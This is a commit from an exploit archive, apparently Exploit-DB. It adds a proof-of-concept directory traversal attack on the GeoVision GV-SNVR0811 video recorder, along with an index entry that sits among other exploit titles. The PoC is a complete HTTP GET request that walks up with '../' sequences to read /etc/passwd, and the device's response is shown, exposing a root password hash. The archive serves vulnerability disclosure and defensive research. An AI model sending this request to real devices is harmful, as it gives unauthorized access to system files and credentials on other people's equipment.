DB: 2018-07-23

1 changes to exploits/shellcodes

GeoVision GV-SNVR0811 - Directory Traversal
This commit is contained in:
Offensive Security 2018-07-23 05:01:45 +00:00
parent 350bb348ff
commit 939bd7d9cd
2 changed files with 35 additions and 0 deletions

View file

@ -0,0 +1,34 @@
# Exploit Title: GeoVision GV-SNVR0811 Directory Traversal
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Hardware
# Date: 2018-07-21
# Vendor Homepage: http://www.geovision.com.tw/product/GV-SNVR0811
# Software Link: http://www.geovision.com.tw/product/GV-SNVR0811
# Affected Version: N/A
# Tested on: Parrot OS
# CVE : N/A
# Proof Of Concept
GET Request
GET ../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response
HTTP/1.1 200 OK
Server:Cross Web Server
Content-length: 59
Content-type: application/octet-stream
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh

View file

@ -39671,6 +39671,7 @@ id,file,description,date,author,type,platform,port
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80

Can't render this file because it is too large.